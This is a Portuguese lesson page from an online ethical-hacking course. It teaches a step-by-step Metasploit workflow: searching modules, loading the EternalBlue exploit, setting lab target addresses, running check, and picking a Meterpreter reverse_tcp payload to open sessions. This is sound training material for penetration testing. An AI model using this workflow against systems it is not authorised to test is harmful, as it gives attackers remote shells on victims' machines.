0Pricing
Ethical Hacking Academy · Aula

Pesquisa e uso de exploits

Encontre e execute

Pesquisa e uso de exploits é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.

Do reconhecimento à exploração

Após a varredura, o senhor conhece os serviços e as versões do alvo. O próximo passo é encontrar um módulo de exploração que corresponda a uma vulnerabilidade conhecida nessas versões.

O comando search do Metasploit é sua porta de entrada para milhares de módulos. Pesquisar com precisão economiza tempo e evita executar o código errado.

Busca básica

O comando search consulta o índice de módulos por palavra-chave. O senhor pode pesquisar pelo nome do software, por CVE ou pelo serviço.

search eternalblue
search type:exploit platform:windows smb

Filtros de busca

Refine os resultados com filtros:

  • type: exploit, auxiliary, post.
  • platform: windows, linux, unix.
  • cve: um identificador CVE específico.
  • rank: excelente, ótimo, bom (confiabilidade).

Combinar filtros reduz rapidamente milhares de módulos a apenas alguns.

search cve:2017-0144 type:exploit

Lendo os resultados da busca

Os resultados da busca listam cada módulo com uma classificação, uma data de divulgação e um indicador de verificação. A classificação reflete a confiabilidade e a segurança da exploração.

  • excellent: é improvável que derrube o alvo.
  • great/good: confiável em condições comuns.
  • low/manual: arriscado ou exige configuração cuidadosa.

Prefira módulos com classificação mais alta para evitar derrubar sistemas de produção.

Carregando um módulo

Use o número de índice ou o caminho completo do módulo com use. O prompt muda para mostrar o módulo carregado, e o armazenamento de dados passa a conter as opções desse módulo.

use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >

Inspecionando o módulo

Antes de executar, leia sobre o módulo. info mostra a descrição, as referências (CVEs, avisos), as opções obrigatórias e os alvos compatíveis.

Entender o que um módulo faz faz parte do uso profissional e responsável; nunca dispare uma exploração que não compreenda.

info
show options
show targets

Configurando opções

Configure as opções obrigatórias com set. As opções comuns para uma exploração remota são o endereço do alvo e as configurações da sua carga útil.

set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2

O comando check

Muitas explorações são compatíveis com check, que testa com segurança se o alvo parece vulnerável sem explorá-lo de fato.

Executar check primeiro é uma boa prática: reduz o risco de travar um sistema e confirma que você está prestes a investir esforço em uma oportunidade real.

check
# [+] 10.10.10.40:445 - The target is vulnerable.

Escolhendo a carga útil

Uma exploração precisa de uma carga útil. O Metasploit escolhe uma opção padrão, mas você pode listar e escolher uma adequada ao alvo e às suas necessidades de acesso.

show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Executando e gerenciando sessões

Inicie com exploit (ou run). Se tiver sucesso, você obterá uma sessão, uma conexão interativa com o alvo.

Gerencie várias sessões com sessions -l para listá-las e sessions -i N para interagir. Envie uma sessão para segundo plano com background para continuar trabalhando no console.

exploit
sessions -l
sessions -i 1

Opções globais versus opções do módulo

Algumas configurações, como LHOST, são reutilizadas em vários módulos. Defina-as globalmente com setg para não precisar digitá-las novamente sempre que trocar de módulo.

  • set: aplica-se apenas ao módulo atual.
  • setg: aplica-se globalmente entre os módulos.
  • unsetg: limpa um valor global.

Isso economiza tempo durante trabalhos longos com muitos módulos.

setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40

Verificação rápida

Escolha a etapa responsável antes de disparar uma exploração.

Recapitulação

Você aprendeu a encontrar e executar explorações:

  • Use search com filtros (tipo, plataforma, cve, classificação) para encontrar módulos.
  • Prefira módulos com rank mais alto para obter confiabilidade e segurança.
  • Use use para carregar, info/show options para inspecionar e set para configurar.
  • Execute check primeiro; depois, exploit para obter uma session.
  • Gerencie sessões com sessions -l/-i.

A seguir: cargas úteis e o shell pós-exploração Meterpreter.

Perguntas Frequentes

A aula “Pesquisa e uso de exploits” é grátis?

Sim — o texto completo de “Pesquisa e uso de exploits” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que vou aprender em “Pesquisa e uso de exploits”?

Encontre e execute Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Ethical Hacking Academy?

Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Pesquisa e uso de exploits”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Ethical Hacking Academy?

Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Metasploit
  2. Pesquisa e uso de exploits
  3. Cargas úteis e Meterpreter
  4. Módulos pós-exploração
← Voltar para Ethical Hacking Academy